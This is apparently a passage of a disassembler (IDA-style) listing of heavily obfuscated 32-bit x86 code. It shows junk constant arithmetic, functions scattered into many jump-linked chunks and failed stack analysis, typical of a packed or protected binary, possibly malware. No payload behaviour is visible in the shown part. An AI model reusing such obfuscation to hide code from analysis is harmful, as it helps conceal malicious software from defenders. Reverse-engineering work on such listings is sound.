; START	OF FUNCTION CHUNK FOR sub_448100

loc_43CCB0:				; CODE XREF: sub_448100:loc_43DCD6j
		or	esi, 1AE0970Eh
		rol	esi, 13h
		add	esi, 8788936Dh
		add	esi, ebp
		jmp	loc_449180
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------

loc_43CCC6:				; CODE XREF: hvvrg7ie:0043ACE5j
		pushf

; =============== S U B	R O U T	I N E =======================================



sub_43CCC7	proc near		; CODE XREF: sub_44BCAE-72D8p

; FUNCTION CHUNK AT 0043DA36 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043ED22 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440A47 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045A831 SIZE 0000001E BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xor	eax, 0BFF5B1CAh
		jmp	loc_440A47
sub_43CCC7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4A6

loc_43CCD6:				; CODE XREF: sub_44E4A6:loc_4472FCj
		jnz	loc_458162
; END OF FUNCTION CHUNK	FOR sub_44E4A6
; START	OF FUNCTION CHUNK FOR sub_459A95

loc_43CCDC:				; CODE XREF: sub_459A95-125D7j
		jmp	loc_442144
; END OF FUNCTION CHUNK	FOR sub_459A95
; ---------------------------------------------------------------------------
		ja	loc_44B9CC
		jmp	loc_45815D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_43CCEC:				; CODE XREF: sub_44BFF5+DBCDj
		jnz	loc_446C60
		jmp	loc_444EE2
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_43CCF7:				; CODE XREF: sub_43E60A:loc_4427C9j
		jnz	loc_442D1E
		add	edx, 3C33B91Bh
		xor	edi, ebp
		jmp	loc_442D18
; END OF FUNCTION CHUNK	FOR sub_43E60A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_147. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_43CD0B	proc near		; DATA XREF: hvvrg7ie:0043AD00o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439F91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DFC3 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004413B6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044188A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044201E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004424B0 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044330D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044399C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00445F25 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004469E6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004477BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B386 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E46F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044F2CC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045664E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045822A SIZE 00000016 BYTES

		push	ecx
		push	0E6DF3CBCh
		pop	ecx
		sub	ecx, 0D43E8251h
		cmp	ecx, 6EE0FB9Bh
		jmp	loc_45822A
sub_43CD0B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFB4

loc_43CD23:				; CODE XREF: sub_43BFB4:loc_448015j
		pop	eax
		add	eax, 72D58C92h
		or	eax, 531CB637h
		and	eax, 48259DB0h
		rol	eax, 1Ch
		xor	eax, 40249D2h
		shl	eax, cl
		mov	edx, [ebp-20h]
		jmp	loc_450AE3
; END OF FUNCTION CHUNK	FOR sub_43BFB4

; =============== S U B	R O U T	I N E =======================================



sub_43CD49	proc near		; DATA XREF: sub_43E063+14448o

; FUNCTION CHUNK AT 0044648A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447891 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044DFDD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457129 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004571D2 SIZE 00000014 BYTES

		push	0ABEBD890h
		not	ecx
		jmp	loc_44DFDD
sub_43CD49	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447FEB

loc_43CD55:				; CODE XREF: sub_447FEB+Ej
		push	edi
		push	offset sub_447BB7
		jmp	loc_453CE6
; END OF FUNCTION CHUNK	FOR sub_447FEB
; ---------------------------------------------------------------------------

loc_43CD60:				; CODE XREF: hvvrg7ie:00447299j
		add	edi, ebp
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_43CD62:				; CODE XREF: sub_44B7CB+6934j
		xor	edx, 74AA42D8h
		call	sub_43EC75
		or	large ds:0EDh, ecx
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45471C

loc_43CD74:				; CODE XREF: sub_45471C+16j
		jmp	loc_4434EB
; END OF FUNCTION CHUNK	FOR sub_45471C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_43CD79:				; CODE XREF: sub_450AA8+2E2Fj
		jmp	loc_43D1F1
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D910

loc_43CD7E:				; CODE XREF: sub_43D910+3j
		jmp	loc_43C4B3
; END OF FUNCTION CHUNK	FOR sub_43D910
; ---------------------------------------------------------------------------
		db 0B9h
dword_43CD84	dd 51DF9869h		; DATA XREF: sub_43F7AEr sub_444632+Ew ...
; ---------------------------------------------------------------------------

loc_43CD88:				; CODE XREF: hvvrg7ie:00457FE1j
		jmp	locret_44BF83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF30

loc_43CD8D:				; CODE XREF: sub_43AF30+E5C3j
		jmp	nullsub_500
; END OF FUNCTION CHUNK	FOR sub_43AF30
; ---------------------------------------------------------------------------

loc_43CD92:				; CODE XREF: hvvrg7ie:00448B38j
		jmp	loc_43DC01
; ---------------------------------------------------------------------------
		db 0DFh
dword_43CD98	dd 7E706B77h		; DATA XREF: sub_45B70B-19BBAw
					; sub_4424A6+18A7Ar
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFCF

loc_43CD9C:				; CODE XREF: sub_43BFCF+1CEA4j
		jmp	loc_44FE59
; END OF FUNCTION CHUNK	FOR sub_43BFCF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_43CDA1:				; CODE XREF: sub_45061E+175Cj
		jmp	loc_44A904
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_43CDA6:				; CODE XREF: sub_453405-11E55j
		jmp	nullsub_226
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
		db 13h
dword_43CDAC	dd 8EFA8B97h		; DATA XREF: sub_43EF3E+Ar
					; sub_43EF3E:loc_445D14w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8AA

loc_43CDB0:				; CODE XREF: sub_44C8AA+18j
		jmp	nullsub_94
; END OF FUNCTION CHUNK	FOR sub_44C8AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BB4

loc_43CDB5:				; CODE XREF: sub_444BB4+7j
		jmp	sub_449425
; END OF FUNCTION CHUNK	FOR sub_444BB4
; ---------------------------------------------------------------------------
		dw 76B2h
dword_43CDBC	dd 6978h		; DATA XREF: hvvrg7ie:004538A7r
					; hvvrg7ie:00459487w
dword_43CDC0	dd 1A77E775h		; DATA XREF: sub_43931C+54C0r
					; sub_43931C:loc_4555EBw
dword_43CDC4	dd 0A1BBFBF2h		; DATA XREF: sub_439A6C+980Aw
					; sub_4527A1:loc_446343r
		dd 9CE377E7h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4475EC

loc_43CDCC:				; CODE XREF: sub_4475EC+F1CEj
		jmp	nullsub_247
; END OF FUNCTION CHUNK	FOR sub_4475EC
; ---------------------------------------------------------------------------

loc_43CDD1:				; CODE XREF: hvvrg7ie:00452B33j
		jmp	locret_45516F
; ---------------------------------------------------------------------------

loc_43CDD6:				; CODE XREF: hvvrg7ie:00444189j
		add	ecx, 0D0434F02h
		mov	[ecx], eax
		pop	ecx
		xor	eax, eax
		mov	ds:dword_448CF0, eax
		jmp	loc_44243A
; ---------------------------------------------------------------------------

loc_43CDEB:				; DATA XREF: hvvrg7ie:00449A52o
		mov	[eax], edx

loc_43CDED:				; CODE XREF: hvvrg7ie:loc_44CD4Dj
		pop	eax
; START	OF FUNCTION CHUNK FOR sub_454040

loc_43CDEE:				; CODE XREF: sub_454040+Aj
					; hvvrg7ie:00456226j
		xchg	eax, edx
		call	sub_446A16
		retn
; END OF FUNCTION CHUNK	FOR sub_454040
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575D9

loc_43CDF5:				; CODE XREF: sub_4575D9-9FB6j
		jmp	nullsub_337
; END OF FUNCTION CHUNK	FOR sub_4575D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DE4

loc_43CDFA:				; CODE XREF: sub_448DE4+1C62j
		jmp	loc_445EDE
; END OF FUNCTION CHUNK	FOR sub_448DE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_43CDFF:				; CODE XREF: sub_45A234-14B68j
		jmp	loc_4490E8
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
dword_43CE04	dd 0			; DATA XREF: hvvrg7ie:loc_45621Er
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_43CE08:				; CODE XREF: sub_440C05+E81Bj
		jmp	nullsub_213
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_43CE0D:				; CODE XREF: sub_43D285-32C9j
		jmp	loc_446E1F
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
		dw 1DDh
dword_43CE14	dd 9293295Dh, 0E22A454Eh, 36C664h ; DATA XREF: sub_4527A1-110C1o
					; sub_45A7E8:loc_44562Bo
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451DFF

loc_43CE20:				; CODE XREF: sub_451DFF:loc_451B84j
		pop	edx

loc_43CE21:				; CODE XREF: hvvrg7ie:loc_454E0Cj
		and	esi, 1E2ABB01h
		rol	esi, 17h
		or	esi, 0CAC7AD5Ch
		sub	esi, 8D4E4DE3h
		add	esi, 0C2CBDBC4h
		popf
		jmp	loc_43FF43
; END OF FUNCTION CHUNK	FOR sub_451DFF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_183. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_43CE43:				; CODE XREF: sub_44BEBB-F583j
		jmp	loc_43D9CB
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_43CE48:				; CODE XREF: sub_43A839:loc_446BE1j
		push	190BE5A2h
		pop	ebx
		xor	ebx, 2BFDB014h
		and	ebx, 0FDAB466Fh
		add	ebx, 0CFA2A5A3h
		xchg	ebx, [esp+0]
		jmp	loc_45636A
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45493B

loc_43CE68:				; CODE XREF: sub_45493B:loc_4542F6j
		jl	loc_44ADF0
		or	edi, 0DBE4305Bh
		shr	ecx, 10h
		jmp	loc_44ADF0
; END OF FUNCTION CHUNK	FOR sub_45493B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_43CE7C:				; CODE XREF: sub_43C0DE+1DCA6j
		jl	loc_44203A
		jle	loc_456AE7

loc_43CE88:				; CODE XREF: sub_43C0DE:loc_43D92Dj
		push	0E3D27744h
		pop	eax
		jmp	loc_453C38
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------

loc_43CE93:				; CODE XREF: hvvrg7ie:0045622Cj
		jz	loc_44562A
		jmp	loc_43F200
; ---------------------------------------------------------------------------

loc_43CE9E:				; DATA XREF: sub_445CCD-5233o
		push	edi
		mov	edi, ebx
		xchg	edi, [esp]
		mov	ebx, eax
		cmp	eax, ebx
		jnb	loc_448F15
		shl	eax, 16h
		call	sub_451754

; =============== S U B	R O U T	I N E =======================================



sub_43CEB6	proc near		; CODE XREF: hvvrg7ie:00444096j
					; sub_450F97:loc_447FC3p

; FUNCTION CHUNK AT 0043B18A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444AB7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004554CB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00459243 SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	eax
		push	ecx
		push	0B91085FFh
		pop	ecx
		jmp	loc_4554CB
sub_43CEB6	endp

; ---------------------------------------------------------------------------

loc_43CEC7:				; CODE XREF: hvvrg7ie:00452E28j
		call	sub_439549
		test	al, al
		jz	loc_45B16E
		jmp	loc_44BAB5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_401. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		cmp	esi, 0A9942835h
		jmp	loc_448BAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439B29

loc_43CEE5:				; CODE XREF: sub_439B29+9987j
		mov	ebx, [esi]
		jmp	loc_44ADD5
; END OF FUNCTION CHUNK	FOR sub_439B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_43CEEC:				; CODE XREF: sub_45B9BB:loc_43C854j
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44ADD5
		jmp	loc_4508F5
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_44A654
; ---------------------------------------------------------------------------

loc_43CF06:				; CODE XREF: hvvrg7ie:00444106j
		cmp	edi, 0F8B90F32h
		jmp	loc_4407D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_43CF11:				; CODE XREF: sub_4465A6:loc_440FA8j
		push	0F66C7740h
		pop	esi
		and	esi, 58C273B9h
		sub	esi, 68D0DEF6h
		add	esi, 32706F5Ah
		rol	esi, 1
		jmp	loc_4430FC
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
		mov	eax, 0A5559D12h
		call	sub_450C5A
		mov	ds:dword_41D0FC, eax
		lea	eax, nullsub_356
		jmp	loc_43A175
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_99. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446F6D

loc_43CF4C:				; CODE XREF: sub_446F6D:loc_450041j
		or	esi, 0EB279641h
		sub	esi, 56B60511h
		xor	esi, 7ED094A6h
		sub	esi, 0ADF09DDAh
		add	esi, 0C6635F38h
		xchg	esi, [esp+8+var_8]
		jmp	loc_44822A
; END OF FUNCTION CHUNK	FOR sub_446F6D
; ---------------------------------------------------------------------------
		mov	eax, 92A798AFh

loc_43CF77:				; CODE XREF: hvvrg7ie:0043FB36j
		jmp	loc_45AFD6
; ---------------------------------------------------------------------------

loc_43CF7C:				; DATA XREF: sub_445934:loc_446D27o
		pop	edx
		jo	loc_44C418
		push	offset sub_458F53
		jmp	loc_44BBFB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4417B1

loc_43CF8D:				; CODE XREF: sub_4417B1:loc_44829Cj
		sbb	ebp, edi
		jmp	loc_452568
; END OF FUNCTION CHUNK	FOR sub_4417B1
; ---------------------------------------------------------------------------

loc_43CF94:				; CODE XREF: hvvrg7ie:loc_43A0A6j
		jnz	loc_451C71
		jmp	loc_446C17
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_43CF9F:				; CODE XREF: sub_44398A+7EADj
		push	eax
		pushf
		push	6BF8C3C7h
		pop	eax
		rol	eax, 5
		xor	eax, 2F71805Ch
		rol	eax, 0Ah
		xor	eax, 36DFDDAFh
		jmp	loc_44A0BA
; END OF FUNCTION CHUNK	FOR sub_44398A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_412. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43CFBF:				; CODE XREF: hvvrg7ie:loc_450E95j
		jnz	loc_43B320
		jmp	loc_44BD5C

; =============== S U B	R O U T	I N E =======================================



sub_43CFCA	proc near		; CODE XREF: hvvrg7ie:004502EEj
					; sub_453405:loc_459082p
		xchg	edi, [esp+0]
		pop	edi
		add	edi, ecx
		push	offset loc_453A52
		jmp	nullsub_31
sub_43CFCA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B9C

loc_43CFDA:				; CODE XREF: sub_455B9C-FABCj
		xchg	ebp, [esi]

loc_43CFDC:				; CODE XREF: sub_455B9C:loc_4450B2j
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+4+var_4]
		push	60B99F8Bh
		jmp	loc_43900C
; END OF FUNCTION CHUNK	FOR sub_455B9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_43CFEC:				; CODE XREF: sub_4557D4-FBA8j
		jbe	loc_44E7ED
		adc	eax, 951572DBh

loc_43CFF8:				; CODE XREF: sub_4557D4:loc_44BFC3j
		push	3C30879Eh
		pop	eax
		jmp	loc_43C5C9
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456423

loc_43D003:				; CODE XREF: sub_456423-3228j
		mov	eax, offset dword_45109C
		call	sub_456DE7
		lea	eax, [ebp-14h]
		push	eax
		jmp	loc_43E6DB
; END OF FUNCTION CHUNK	FOR sub_456423
; ---------------------------------------------------------------------------
		pop	edi
		jmp	sub_450F01
; ---------------------------------------------------------------------------

loc_43D01C:				; CODE XREF: hvvrg7ie:loc_4596AAj
		and	eax, esi
		or	ecx, 58B33DB4h
		jmp	loc_4418A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44934B

loc_43D029:				; CODE XREF: sub_44934B-851Bj
		jl	loc_43FFF3
; END OF FUNCTION CHUNK	FOR sub_44934B
; START	OF FUNCTION CHUNK FOR sub_440881

loc_43D02F:				; CODE XREF: sub_440881+7E76j
		jmp	loc_45536E
; END OF FUNCTION CHUNK	FOR sub_440881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43D034:				; CODE XREF: sub_450434-8DE3j
		jmp	loc_45318B
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		and	ecx, 8BAA6156h
		jo	loc_443B09
		jb	loc_456D76
		or	ecx, ebx
		jmp	loc_43FFF1

; =============== S U B	R O U T	I N E =======================================



sub_43D052	proc near		; CODE XREF: sub_4413A5:loc_43B7D1j
					; sub_446407:loc_44AAB1p

; FUNCTION CHUNK AT 00439C55 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	eax, 3F2D399Ch
		call	sub_450C5A
		push	offset loc_4521B7
		jmp	loc_439C55
sub_43D052	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43D06B:				; CODE XREF: hvvrg7ie:00446FF1j
		and	edx, 794EEE7h
		test	edx, 8000h
		jmp	loc_43D198
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_43D07C:				; CODE XREF: sub_4414F6-4E13j
		mov	[ecx], ebp
		adc	ecx, edx
		jmp	loc_449EA4
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------

loc_43D085:				; CODE XREF: hvvrg7ie:00454432j
		xchg	eax, [esp]
		jmp	loc_439C9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FE4

loc_43D08D:				; CODE XREF: sub_441FE4:loc_457FB3j
		sub	eax, edi
		xchg	edx, [esp+0]
		mov	edi, edx
		pop	edx
		jmp	loc_45324E
; END OF FUNCTION CHUNK	FOR sub_441FE4
; ---------------------------------------------------------------------------

loc_43D09A:				; DATA XREF: sub_4413A5+16C2o
		push	7EC6125Ah
		pop	edx
		add	edx, 6DC626C0h
		xor	edx, 0D755D2C2h
		sub	edx, 914D1969h
		jmp	loc_44135E

; =============== S U B	R O U T	I N E =======================================



sub_43D0B7	proc near		; CODE XREF: hvvrg7ie:004445B5j
					; sub_451E1C-C200p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00456A5B SIZE 0000000E BYTES

		xchg	eax, [esp+0]

loc_43D0BA:				; CODE XREF: sub_45278C:loc_43EA8Fj
		pop	eax
		mov	ds:off_41D184, eax
		call	sub_4546C6

loc_43D0C6:				; CODE XREF: hvvrg7ie:0043E2BDj
		jmp	loc_456A5B
sub_43D0B7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_43D0CB:				; CODE XREF: sub_44BCAE+CD7Dj
		jz	loc_444557
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_43D0D1:				; CODE XREF: sub_43D285+199F9j
		jmp	loc_446D6A
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442BA8

loc_43D0D6:				; CODE XREF: sub_442BA8+19j
		jmp	loc_4431EC
; END OF FUNCTION CHUNK	FOR sub_442BA8
; ---------------------------------------------------------------------------
		rol	edx, 17h
		jmp	loc_44454B
; ---------------------------------------------------------------------------
		jnz	loc_449102
		or	esi, ebp
		jmp	sub_4437CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424A6

loc_43D0F0:				; CODE XREF: sub_4424A6+18A80j
		or	eax, eax
		jnz	loc_441B58
		jmp	loc_43B867
; END OF FUNCTION CHUNK	FOR sub_4424A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F0E

loc_43D0FD:				; CODE XREF: sub_452F0E-14C3Bj
		jb	loc_457415
		xor	ebp, edx
		jmp	loc_45758E
; END OF FUNCTION CHUNK	FOR sub_452F0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43D10A:				; CODE XREF: sub_43F227:loc_439AFEj
		jnz	loc_450FA0
		jmp	loc_453249
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F6A

loc_43D115:				; CODE XREF: sub_456F6A+Aj
		push	0
		push	offset loc_43C390
		jmp	nullsub_259
; END OF FUNCTION CHUNK	FOR sub_456F6A
; ---------------------------------------------------------------------------

loc_43D121:				; CODE XREF: hvvrg7ie:0044F395j
		mov	eax, ecx
		sub	edx, 2FBB24B1h
		xor	eax, ebx
		push	offset sub_446284
		jmp	loc_448D20
; ---------------------------------------------------------------------------
		adc	ecx, 90219C09h
		jmp	loc_4563D6

; =============== S U B	R O U T	I N E =======================================



sub_43D140	proc near		; CODE XREF: sub_44E2D2+6p
					; hvvrg7ie:00455196j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043D498 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044317B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448C3F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452E9A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00457D5B SIZE 0000000E BYTES

		xchg	esi, [esp+0]
		pop	esi
		pop	edx
		mov	eax, [esp-8+arg_4]
		push	eax
		mov	eax, edx
		jmp	loc_448C3F
sub_43D140	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43D150:				; CODE XREF: hvvrg7ie:loc_44787Ej
					; hvvrg7ie:loc_44FF42j
		mov	ds:dword_452340, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A0B1

loc_43D157:				; CODE XREF: sub_45A0B1+Bj
		jmp	loc_4554B7
; END OF FUNCTION CHUNK	FOR sub_45A0B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_43D15C:				; CODE XREF: sub_4500FA-12EDj
		jmp	loc_44E91B
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ECAA

loc_43D161:				; CODE XREF: sub_43ECAA+E298j
		jmp	loc_452AD3
; END OF FUNCTION CHUNK	FOR sub_43ECAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_43D166:				; CODE XREF: sub_456A52-1161Dj
		jmp	loc_4570F8
; END OF FUNCTION CHUNK	FOR sub_456A52

; =============== S U B	R O U T	I N E =======================================



sub_43D16B	proc near		; CODE XREF: hvvrg7ie:loc_441438p
					; sub_45488E:loc_4466B0p ...

var_1C		= dword	ptr -1Ch

; FUNCTION CHUNK AT 0043A962 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F308 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004401F0 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00440D02 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441E6F SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044222D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044A345 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A581 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004555A9 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00456CAD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004583D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A250 SIZE 0000000B BYTES

		jno	sub_4557D4
		push	ebp
		jmp	loc_440D02
sub_43D16B	endp

; ---------------------------------------------------------------------------
		popf
		jmp	loc_44A6D6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_130. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43D17E:				; CODE XREF: hvvrg7ie:0045A1F9j
		jmp	loc_453AD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447744

loc_43D183:				; CODE XREF: sub_447744-5667j
		jmp	nullsub_280
; END OF FUNCTION CHUNK	FOR sub_447744
; ---------------------------------------------------------------------------

loc_43D188:				; CODE XREF: hvvrg7ie:0043B5B9j
		sbb	esi, eax
; START	OF FUNCTION CHUNK FOR sub_4522F8

loc_43D18A:				; CODE XREF: sub_4522F8-16D4Cj
		rol	edx, 3
		jb	loc_45558F
; END OF FUNCTION CHUNK	FOR sub_4522F8
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_43D193:				; CODE XREF: sub_44388C+8BFBj
		jmp	loc_4564C2
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------

loc_43D198:				; CODE XREF: hvvrg7ie:0043D077j
		jmp	loc_455787
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_455580

; =============== S U B	R O U T	I N E =======================================



sub_43D1A3	proc near		; CODE XREF: sub_451D01j
					; DATA XREF: sub_451CF6+1o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440DB7 SIZE 00000023 BYTES

		push	5B59F710h
		xchg	ebx, [esp+4+var_4]
		mov	esi, ebx
		pop	ebx
		jmp	loc_440DB7
sub_43D1A3	endp

; ---------------------------------------------------------------------------

loc_43D1B3:				; CODE XREF: hvvrg7ie:0043EC49j
		jno	loc_4470BA
		mov	ecx, 9E0217B2h
		sbb	esi, 0C61C91E2h
		push	ebp
		xor	esi, ecx
; START	OF FUNCTION CHUNK FOR sub_43B547

loc_43D1C7:				; CODE XREF: sub_43B547:loc_43EC24j
		call	sub_44398A
; END OF FUNCTION CHUNK	FOR sub_43B547
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_43D1CC:				; CODE XREF: sub_456A52-140E9j
		jmp	loc_4463DD
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------

loc_43D1D1:				; CODE XREF: hvvrg7ie:0044982Dj
		mov	edx, ebx
		adc	edi, 6F9BE233h
		add	ebx, edx
		push	0ACDDFCBh
		jmp	loc_43BF3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_43D1E5:				; CODE XREF: sub_43C0DE:loc_4587D1j
		jz	sub_44ADA5

loc_43D1EB:				; CODE XREF: hvvrg7ie:loc_457B80j
		jmp	loc_43B7FB
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------

locret_43D1F0:				; CODE XREF: hvvrg7ie:004499C1j
		retn
; ---------------------------------------------------------------------------
